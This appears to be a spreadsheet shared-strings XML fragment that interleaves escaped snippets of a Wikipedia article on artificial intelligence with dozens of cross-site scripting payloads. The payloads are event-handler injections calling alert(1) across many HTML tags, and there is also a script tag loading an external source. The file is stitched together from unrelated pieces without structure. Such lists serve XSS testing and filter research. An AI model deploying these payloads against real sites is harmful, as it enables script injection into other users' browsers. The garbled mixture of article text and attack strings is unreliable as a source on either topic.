    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_mechanical_engineering" title="Glossary of mechanical engineering"&gt;Mechanical engineering &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">             &lt;p class="caption"&gt;&lt;span class="caption-text"&gt;First steps</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;thead ondrop=alert(1) contenteditable&gt;drop here&lt;/thead&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;img id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/img&gt;</t>
  </si>
  <si>
    <t>&lt;object id=x tabindex=1 onactivate=alert(1)&gt;&lt;/object&gt;</t>
  </si>
  <si>
    <t>&lt;summary oncut="alert(1)" contenteditable&gt;test&lt;/summary&gt;</t>
  </si>
  <si>
    <t>&lt;video autoplay controls onwaiting=alert(1)&gt;&lt;source src="validvideo.mp4" type=video/mp4&gt;&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span class="mw-headline" id="Machine_consciousness,_sentience_and_mind"&gt;Machine consciousness, sentience and mind </t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;button ondrop=alert(1) contenteditable&gt;drop here&lt;/button&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onbeforecut="alert(1)" contenteditable&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Glossary_of_architecture" title="Glossary of architecture"&gt;Architecture &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-28"&gt;&lt;a href="#Logic"&gt;&lt;span class="tocnumber"&gt;6.2 </t>
  </si>
  <si>
    <t>SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;head id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;wbr oncopy="alert(1)" contenteditable&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;listing id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/listing&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;u draggable="true" ondragstart="alert(1)"&gt;test&lt;/u&gt;</t>
  </si>
  <si>
    <t>&lt;var id=x tabindex=1 onbeforedeactivate=alert(1)&gt;&lt;/var&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;select onmousedown="alert(1)"&gt;test&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Developmental_robotics" title="Developmental robotics"&gt;Developmental &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;em ondblclick="alert(1)"&gt;test&lt;/em&gt;</t>
  </si>
  <si>
    <t>&lt;source id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/source&gt;</t>
  </si>
  <si>
    <t>&lt;font onpointerenter=alert(1)&gt;XSS&lt;/font&gt;</t>
  </si>
  <si>
    <t>&lt;noscript draggable="true" ondrag="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;frameset id=x tabindex=1 onactivate=alert(1)&gt;&lt;/frameset&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;data ondrop=alert(1) contenteditable&gt;drop here&lt;/data&gt;</t>
  </si>
  <si>
    <t>&lt;code id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;main id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/main&gt;</t>
  </si>
  <si>
    <t>&lt;menuitem onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/menuitem&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;figure onmousemove="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=43" title="Edit section: Military"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;th id=x tabindex=1 onactivate=alert(1)&gt;&lt;/th&gt;</t>
  </si>
  <si>
    <t>&lt;wbr draggable="true" ondragstart="alert(1)"&gt;test&lt;/wbr&gt;</t>
  </si>
  <si>
    <t>&lt;input2 onpointerup=alert(1)&gt;XSS&lt;/input2&gt;</t>
  </si>
  <si>
    <t>&lt;source onpointerover=alert(1)&gt;XSS&lt;/source&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;h4&gt;&lt;span class="mw-headline" id="Knowledge-based"&gt;Knowledge-based </t>
  </si>
  <si>
    <t>&lt;hgroup onkeydown="alert(1)" contenteditable&gt;test&lt;/hgroup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-Turing_test-351"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-Turing_test_351-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;audio onpointerenter=alert(1)&gt;XSS&lt;/audio&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li&gt;&lt;cite id="CITEREFBrooks1991" class="citation encyclopaedia"&gt;Brooks, R. A. (1991). "How to build complete creatures rather than isolated cognitive simulators".  In VanLehn, K. (ed.). &lt;i&gt;Architectures for Intelligence &lt;/i&gt;. Hillsdale, NJ: Lawrence Erlbaum Associates. pp.&amp;#160;225–239. &lt;a href="/wiki/CiteSeerX" title="CiteSeerX"&gt;CiteSeerX &lt;/a&gt;&amp;#160;&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//citeseerx.ist.psu.edu/viewdoc/summary?doi=10.1.1.52.9510"&gt;10.1.1.52.9510 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;dt onpointerenter=alert(1)&gt;XSS&lt;/dt&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;These algorithms proved to be insufficient for solving large reasoning problems, because they experienced a "combinatorial explosion": they became exponentially slower as the problems grew larger.&lt;sup id="cite_ref-Intractability_68-1" class="reference"&gt;&lt;a href="#cite_note-Intractability-68"&gt;&amp;#91;66&amp;#93; &lt;/a&gt; &lt;/sup&gt; In fact, even humans rarely use the step-by-step deduction that early AI research was able to model. They solve most of their problems using fast, intuitive judgments.&lt;sup id="cite_ref-Psychological_evidence_of_sub-symbolic_reasoning_90-0" class="reference"&gt;&lt;a href="#cite_note-Psychological_evidence_of_sub-symbolic_reasoning-90"&gt;&amp;#91;87&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;509–530, &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;shadow id=x tabindex=1 onactivate=alert(1)&gt;&lt;/shadow&gt;</t>
  </si>
  <si>
    <t>&lt;meta id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/meta&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFRussellNorvig2003"&gt;Russell &amp;amp; Norvig 2003 &lt;/a&gt;, pp.&amp;#160;22–24 &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;kbd onkeyup="alert(1)" contenteditable&gt;test&lt;/kbd&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Alfred_Radcliffe-Brown" title="Alfred Radcliffe-Brown"&gt;Alfred Radcliffe-Brown &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;col id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;form onsubmit=alert(1)&gt;&lt;input type=submit&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-182"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-182"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-11"&gt;&lt;a href="#Motion_and_manipulation"&gt;&lt;span class="tocnumber"&gt;4.7 </t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{from {left:0;}to {left: 1000px;}}:target {animation:10s ease-in-out 0s 1 x;}&lt;/style&gt;&lt;bdo id=x style="position:absolute;" onanimationcancel="alert(1)"&gt;&lt;/bdo&gt;</t>
  </si>
  <si>
    <t>&lt;i onmousedown="alert(1)"&gt;test&lt;/i&gt;</t>
  </si>
  <si>
    <t>&lt;blink oncopy="alert(1)" contenteditable&gt;test&lt;/blink&gt;</t>
  </si>
  <si>
    <t>&lt;sub onpointerout=alert(1)&gt;XSS&lt;/sub&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;Can a machine be intelligent? Can it "think"?</t>
  </si>
  <si>
    <t>&lt;picture draggable="true" ondragenter="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
    <t>&lt;script draggable="true" ondrag="alert(1)"&gt;test&lt;/script&gt;</t>
  </si>
  <si>
    <t>&lt;b onclick="alert(1)"&gt;test&lt;/b&gt;</t>
  </si>
  <si>
    <t>&lt;dialog id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/dialog&gt;</t>
  </si>
  <si>
    <t>&lt;sup id="cite_ref-150" class="reference"&gt;&lt;a href="#cite_note-150"&gt;&amp;#91;147&amp;#93; &lt;/a&gt; &lt;/sup&gt; Besides &lt;a href="/wiki/Transfer_learning" title="Transfer learning"&gt;transfer learning &lt;/a&gt;,</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;p&gt;The earliest (and easiest to understand) approach to AI was symbolism (such as formal logic): "If an otherwise healthy adult has a fever, then they may have &lt;a href="/wiki/Influenza" title="Influenza"&gt;influenza &lt;/a&gt;". A second, more general, approach is &lt;a href="/wiki/Bayesian_inference" title="Bayesian inference"&gt;Bayesian inference &lt;/a&gt;: "If the current patient has a fever, adjust the probability they have influenza in such-and-such way". The third major approach, extremely popular in routine business AI applications, are analogizers such as &lt;a href="/wiki/Support_vector_machine" class="mw-redirect" title="Support vector machine"&gt;SVM &lt;/a&gt; and &lt;a href="/wiki/K-nearest_neighbor_algorithm" class="mw-redirect" title="K-nearest neighbor algorithm"&gt;nearest-neighbor &lt;/a&gt;: "After examining the records of known past patients whose temperature, symptoms, age, and other factors mostly match the current patient, X% of those patients turned out to have influenza". A fourth approach is harder to intuitively understand, but is inspired by how the brain's machinery works: the &lt;a href="/wiki/Artificial_neural_network" title="Artificial neural network"&gt;artificial neural network &lt;/a&gt; approach uses artificial "&lt;a href="/wiki/Neurons" class="mw-redirect" title="Neurons"&gt;neurons &lt;/a&gt;" that can learn by comparing itself to the desired output and altering the strengths of the connections between its internal neurons to "reinforce" connections that seemed to be useful. These four main approaches can overlap with each other and with evolutionary systems; for example, neural nets can learn to make inferences, to generalize, and to make analogies. Some systems implicitly or explicitly use multiple of these approaches, alongside many other AI and non-AI algorithms; the best approach is often different depending on the problem.&lt;sup id="cite_ref-FOOTNOTEDomingos2015Chapter_2,_Chapter_4,_Chapter_6_71-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTEDomingos2015Chapter_2,_Chapter_4,_Chapter_6-71"&gt;&amp;#91;69&amp;#93; &lt;/a&gt; &lt;/sup&gt;&lt;sup id="cite_ref-72" class="reference"&gt;&lt;a href="#cite_note-72"&gt;&amp;#91;70&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;figure draggable="true" ondragleave="alert(1)"&gt;test&lt;/figure&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=24" title="Edit section: Statistical learning"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Machine+Intelligence&amp;amp;rft.atitle=Some+philosophical+problems+from+the+standpoint+of+artificial+intelligence&amp;amp;rft.volume=4&amp;amp;rft.pages=463-502&amp;amp;rft.date=1969&amp;amp;rft_id=%2F%2Fciteseerx.ist.psu.edu%2Fviewdoc%2Fsummary%3Fdoi%3D10.1.1.85.5082&amp;amp;rft.aulast=McCarthy&amp;amp;rft.aufirst=John&amp;amp;rft.au=Hayes%2C+P.+J.&amp;amp;rft_id=http%3A%2F%2Fwww-formal.stanford.edu%2Fjmc%2Fmcchay69.html&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;ul&gt;&lt;li&gt;&lt;a href="#CITEREFMcCorduck2004"&gt;McCorduck (2004 &lt;/a&gt;, pp.&amp;#160;190–25) discusses &lt;i&gt;&lt;a href="/wiki/Frankenstein" title="Frankenstein"&gt;Frankenstein &lt;/a&gt; &lt;/i&gt; and identifies the key ethical issues as scientific hubris and the suffering of the monster, i.e. &lt;a href="/wiki/Robot_rights" class="mw-redirect" title="Robot rights"&gt;robot rights &lt;/a&gt;. &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;label onpointerover=alert(1)&gt;XSS&lt;/label&gt;</t>
  </si>
  <si>
    <t>&lt;svg onpointerup=alert(1)&gt;XSS&lt;/svg&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Dartmouth_workshop" title="Dartmouth workshop"&gt;Dartmouth workshop &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;svg&gt;&lt;select onload=alert(1)&gt;&lt;/select&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFLugerStubblefield2004"&gt;Luger &amp;amp; Stubblefield 2004 &lt;/a&gt;, pp.&amp;#160;623–630 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Philosophy_of_AI" class="mw-redirect" title="Philosophy of AI"&gt;Philosophy of AI &lt;/a&gt;, &lt;a href="/wiki/Turing_test" title="Turing test"&gt;Turing test &lt;/a&gt;, &lt;a href="/wiki/Physical_symbol_systems_hypothesis" class="mw-redirect" title="Physical symbol systems hypothesis"&gt;Physical symbol systems hypothesis &lt;/a&gt;, &lt;a href="/wiki/Dreyfus%27_critique_of_AI" class="mw-redirect" title="Dreyfus&amp;#39; critique of AI"&gt;Dreyfus' critique of AI &lt;/a&gt;, &lt;a href="/wiki/The_Emperor%27s_New_Mind" title="The Emperor&amp;#39;s New Mind"&gt;The Emperor's New Mind &lt;/a&gt;, and &lt;a href="/wiki/AI_effect" title="AI effect"&gt;AI effect &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;div draggable="true" contenteditable&gt;drag me&lt;/div&gt;&lt;tr ondrop=alert(1) contenteditable&gt;drop here&lt;/tr&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=1" title="Edit section: History"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Machine_ethics" title="Machine ethics"&gt;Machine ethics &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;SCRIPT "a='&gt;'" SRC="httx://.rocks/.js"&gt;&lt;/SCRIPT&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-2 tocsection-56"&gt;&lt;a href="#Ethical_machines"&gt;&lt;span class="tocnumber"&gt;8.3 </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="/wiki/Paul_Werbos" title="Paul Werbos"&gt;Paul Werbos &lt;/a&gt; (1982). Applications of advances in nonlinear sensitivity analysis. In System modeling and optimization (pp. 762–770). Springer Berlin Heidelberg. &lt;a rel="nofollow" class="external text" href="http://werbos.com/Neural/SensitivityIFIPSeptember1981.pdf"&gt;Online &lt;/a&gt; &lt;a rel="nofollow" class="external text" href="https://web.archive.org/web/20160414055503/http://werbos.com/Neural/SensitivityIFIPSeptember1981.pdf"&gt;Archived &lt;/a&gt; 14 April 2016 at the &lt;a href="/wiki/Wayback_Machine" title="Wayback Machine"&gt;Wayback Machine &lt;/a&gt; </t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;a href="/w/index.php?title=Artificial_intelligence&amp;amp;action=edit&amp;amp;section=65" title="Edit section: Superintelligence"&gt;edit &lt;/a&gt;&lt;span class="mw-editsection-bracket"&gt;] </t>
  </si>
  <si>
    <t>Representing categories and relations: &lt;a href="/wiki/Semantic_network" title="Semantic network"&gt;Semantic networks &lt;/a&gt;, &lt;a href="/wiki/Description_logic" title="Description logic"&gt;description logics &lt;/a&gt;, &lt;a href="/wiki/Inheritance_(computer_science)" class="mw-redirect" title="Inheritance (computer science)"&gt;inheritance &lt;/a&gt; (including &lt;a href="/wiki/Frame_(artificial_intelligence)" title="Frame (artificial intelligence)"&gt;frames &lt;/a&gt; and &lt;a href="/wiki/Scripts_(artificial_intelligence)" class="mw-redirect" title="Scripts (artificial intelligence)"&gt;scripts &lt;/a&gt;):</t>
  </si>
  <si>
    <t>&lt;head id=x tabindex=1 onactivate=alert(1)&gt;&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;video onkeydown="alert(1)" contenteditable&gt;test&lt;/video&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt;&lt;span style="display: inline-block; margin-left: 4px; width: 182px; vertical-align: middle;"&gt;&lt;a href="https://en.wiktionary.org/wiki/artificial_intelligence" class="extiw" title="wikt:artificial intelligence"&gt;Definitions &lt;/a&gt; from Wiktionary </t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;sup id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/sup&gt;</t>
  </si>
  <si>
    <t>&lt;embed id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;legend onmouseover="alert(1)"&gt;test&lt;/legend&gt;</t>
  </si>
  <si>
    <t>&lt;nextid draggable="true" ondragstart="alert(1)"&gt;test&lt;/nextid&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;map id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;a href="/wiki/Speech_recognition" title="Speech recognition"&gt;Speech recognition &lt;/a&gt;:</t>
  </si>
  <si>
    <t>&lt;embed draggable="true" ondragstart="alert(1)"&gt;test&lt;/embed&gt;</t>
  </si>
  <si>
    <t>&lt;col id=x tabindex=1 ondeactivate=alert(1)&gt;&lt;/col&gt;&lt;input id=y autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-FOOTNOTEDomingos201588-218"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-FOOTNOTEDomingos201588_218-0"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="/wiki/Thomas_Hobbes" title="Thomas Hobbes"&gt;Thomas Hobbes &lt;/a&gt; &lt;/li&gt;</t>
  </si>
  <si>
    <t>&lt;image2 onpointerenter=alert(1)&gt;XSS&lt;/image2&gt;</t>
  </si>
  <si>
    <t>&lt;head onclick="alert(1)"&gt;test&lt;/head&gt;</t>
  </si>
  <si>
    <t>&lt;nav id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/nav&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	&lt;span class="mw-editsection"&gt;</t>
  </si>
  <si>
    <t>&lt;content onpointermove=alert(1)&gt;XSS&lt;/content&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-1 tocsection-35"&gt;&lt;a href="#Applications"&gt;&lt;span class="tocnumber"&gt;7 </t>
  </si>
  <si>
    <t>&lt;ul id=x tabindex=1 onfocusin=alert(1)&gt;&lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;abbr onmousedown="alert(1)"&gt;test&lt;/abbr&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;marquee style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;col onkeyup="alert(1)" contenteditable&gt;test&lt;/col&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;progress style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/progress&gt;</t>
  </si>
  <si>
    <t>&lt;tt oncopy="alert(1)" contenteditable&gt;test&lt;/tt&gt;</t>
  </si>
  <si>
    <t>&lt;p&gt;AI is relevant to any intellectual task.&lt;sup id="cite_ref-FOOTNOTERussellNorvig20091_289-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTERussellNorvig20091-289"&gt;&amp;#91;278&amp;#93; &lt;/a&gt; &lt;/sup&gt; Modern artificial intelligence techniques are pervasive&lt;sup id="cite_ref-:1_290-0" class="reference"&gt;&lt;a href="#cite_note-:1-290"&gt;&amp;#91;279&amp;#93; &lt;/a&gt; &lt;/sup&gt; and are too numerous to list here. Frequently, when a technique reaches mainstream use, it is no longer considered artificial intelligence; this phenomenon is described as the &lt;a href="/wiki/AI_effect" title="AI effect"&gt;AI effect &lt;/a&gt;.&lt;sup id="cite_ref-FOOTNOTE&amp;#39;&amp;#39;CNN&amp;#39;&amp;#39;2006_291-0" class="reference"&gt;&lt;a href="#cite_note-FOOTNOTE&amp;#39;&amp;#39;CNN&amp;#39;&amp;#39;2006-291"&gt;&amp;#91;280&amp;#93; &lt;/a&gt; &lt;/sup&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation journal"&gt;Jordan, M. I.; Mitchell, T. M. (16 July 2015). "Machine learning: Trends, perspectives, and prospects". &lt;i&gt;Science &lt;/i&gt;. &lt;b&gt;349 &lt;/b&gt; (6245): 255–260. &lt;a href="/wiki/Bibcode" title="Bibcode"&gt;Bibcode &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://ui.adsabs.harvard.edu/abs/2015Sci...349..255J"&gt;2015Sci...349..255J &lt;/a&gt;. &lt;a href="/wiki/Digital_object_identifier" title="Digital object identifier"&gt;doi &lt;/a&gt;:&lt;a rel="nofollow" class="external text" href="https://doi.org/10.1126%2Fscience.aaa8415"&gt;10.1126/science.aaa8415 &lt;/a&gt;. &lt;a href="/wiki/PubMed_Identifier" class="mw-redirect" title="PubMed Identifier"&gt;PMID &lt;/a&gt;&amp;#160;&lt;a rel="nofollow" class="external text" href="//pubmed.ncbi.nlm.nih.gov/26185243"&gt;26185243 &lt;/a&gt;. &lt;/cite&gt;&lt;span title="ctx_ver=Z39.88-2004&amp;amp;rft_val_fmt=info%3Aofi%2Ffmt%3Akev%3Amtx%3Ajournal&amp;amp;rft.genre=article&amp;amp;rft.jtitle=Science&amp;amp;rft.atitle=Machine+learning%3A+Trends%2C+perspectives%2C+and+prospects&amp;amp;rft.volume=349&amp;amp;rft.issue=6245&amp;amp;rft.pages=255-260&amp;amp;rft.date=2015-07-16&amp;amp;rft_id=info%3Apmid%2F26185243&amp;amp;rft_id=info%3Adoi%2F10.1126%2Fscience.aaa8415&amp;amp;rft_id=info%3Abibcode%2F2015Sci...349..255J&amp;amp;rft.aulast=Jordan&amp;amp;rft.aufirst=M.+I.&amp;amp;rft.au=Mitchell%2C+T.+M.&amp;amp;rfr_id=info%3Asid%2Fen.wikipedia.org%3AArtificial+intelligence" class="Z3988"&gt; </t>
  </si>
  <si>
    <t>&lt;menu onpointerenter=alert(1)&gt;XSS&lt;/menu&gt;</t>
  </si>
  <si>
    <t>&lt;menu onpointerleave=alert(1)&gt;XSS&lt;/menu&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;a href="#CITEREFTaoTan2005"&gt;Tao &amp;amp; Tan 2005 &lt;/a&gt;. </t>
  </si>
  <si>
    <t>&lt;map onpaste="alert(1)" contenteditable&gt;test&lt;/map&gt;</t>
  </si>
  <si>
    <t>&lt;noscript onmouseleave="alert(1)"&gt;test&lt;/noscript&gt;</t>
  </si>
  <si>
    <t>&lt;em onblur=alert(1) tabindex=1 id=x&gt;&lt;/em&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t>&lt;style onpointerdown=alert(1)&gt;XSS&lt;/style&gt;</t>
  </si>
  <si>
    <t>exp/*&lt;A STYLE='no\:no("*//*");</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color:red;}&lt;/style&gt;&lt;code id=x style="transition:color 1s" ontransitionend=alert(1)&gt;&lt;/code&gt;</t>
  </si>
  <si>
    <t>&lt;br onpointerenter=alert(1)&gt;XSS&lt;/br&gt;</t>
  </si>
  <si>
    <t>&lt;colgroup id=x tabindex=1 onbeforeactivate=alert(1)&gt;&lt;/colgroup&gt;</t>
  </si>
  <si>
    <t>&lt;br onbeforecut="alert(1)" contenteditable&gt;test&lt;/br&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li id="cite_note-80"&gt;&lt;span class="mw-cite-backlink"&gt;&lt;b&gt;&lt;a href="#cite_ref-80"&gt;^ &lt;/a&gt; &lt;/b&gt; </t>
  </si>
  <si>
    <t>&lt;marquee onmouseover="alert(1)"&gt;test&lt;/marquee&gt;</t>
  </si>
  <si>
    <t>&lt;xmp onfocusout=alert(1) tabindex=1 id=x&gt;&lt;/xmp&gt;&lt;input autofocus&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;li class="toclevel-3 tocsection-61"&gt;&lt;a href="#Consciousness"&gt;&lt;span class="tocnumber"&gt;8.4.1 </t>
  </si>
  <si>
    <t>&lt;cite onpointerleave=alert(1)&gt;XSS&lt;/cite&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {color: red;}&lt;/style&gt;&lt;input id=x style="transition:color 10s" ontransitioncancel=alert(1)&gt;&lt;/input&gt;</t>
  </si>
  <si>
    <t xml:space="preserve">	 &lt;/span&gt; &lt;span class="reference-text"&gt;&lt;cite class="citation arxiv"&gt;Jozefowicz, Rafal; Vinyals, Oriol; Schuster, Mike; Shazeer, Noam; Wu, Yonghui (2016). "Exploring the Limits of Language Modeling". &lt;a href="/wiki/ArXiv" title="ArXiv"&gt;arXiv &lt;/a&gt;:&lt;span class="cs1-lock-free" title="Freely accessible"&gt;&lt;a rel="nofollow" class="external text" href="//arxiv.org/abs/1602.02410"&gt;1602.02410 &lt;/a&gt; </t>
  </si>
  <si>
    <t>&lt;big onpointerenter=alert(1)&gt;XSS&lt;/big&gt;</t>
  </si>
  <si>
    <t>&lt;div role="note" class="hatnote navigation-not-searchable"&gt;Main articles: &lt;a href="/wiki/Philosophy_of_artificial_intelligence" title="Philosophy of artificial intelligence"&gt;Philosophy of artificial intelligence &lt;/a&gt; and &lt;a href="/wiki/Ethics_of_artificial_intelligence" title="Ethics of artificial intelligence"&gt;Ethics of artificial intelligence &lt;/a&gt; &lt;/div&gt;</t>
  </si>
  <si>
    <t>&lt;strong onbeforecopy="alert(1)" contenteditable&gt;test&lt;/strong&gt;</t>
  </si>
  <si>
    <t>&lt;del onpointerout=alert(1)&gt;XSS&lt;/del&gt;</t>
  </si>
  <si>
    <t>&lt;li&gt;&lt;a href="#CITEREFCrevier1993"&gt;Crevier 1993 &lt;/a&gt;, pp.&amp;#160;258–263 &lt;/li&gt; &lt;/ul&gt;</t>
  </si>
  <si>
    <t>&lt;rp draggable="true" ondrag="alert(1)"&gt;test&lt;/rp&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;@keyframes x{}&lt;/style&gt;&lt;kbd style="animation-name:x" onanimationstart="alert(1)"&gt;&lt;/kbd&gt;</t>
  </si>
  <si>
    <t xml:space="preserve"> &lt;/p&gt;&lt;p&gt;Among the most difficult problems in knowledge representation are:</t>
  </si>
  <si>
    <t>&lt;ins onmouseleave="alert(1)"&gt;test&lt;/ins&gt;</t>
  </si>
  <si>
    <t>&lt;style&gt;:target {transform: rotate(180deg);}&lt;/style&gt;&lt;tbody id=x style="transition:transform 2s" ontransitionrun=alert(1)&gt;&lt;/tbody&gt;</t>
  </si>
  <si>
    <t>&lt;picture draggable="true" ondragstart="alert(1)"&gt;test&lt;/picture&gt;</t>
  </si>
  <si>
